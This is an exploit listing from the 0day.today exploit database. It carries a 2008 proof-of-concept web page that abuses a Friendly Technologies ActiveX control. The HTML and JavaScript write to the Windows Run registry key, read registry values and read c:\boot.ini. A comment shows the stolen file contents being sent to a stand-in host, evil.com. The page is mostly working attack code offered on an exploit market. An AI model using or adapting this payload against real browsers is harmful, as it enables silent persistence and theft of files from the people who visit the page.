[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Friendly Technologies Read/Write Registry/Read Files Exploit

Author
spdr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9252
Category
remote exploits
Date add
29-08-2008
Platform
unsorted
============================================================
Friendly Technologies Read/Write Registry/Read Files Exploit
============================================================





<!-- 
Proof of Concept...
Read write to registry
and also read files

More codes at irc.nix.co.il/#binaryvision !
-->

<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>

<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) = "Input Here";

// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version", 1);
alert(readreg);

// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>



#  0day.today [2024-12-25]  #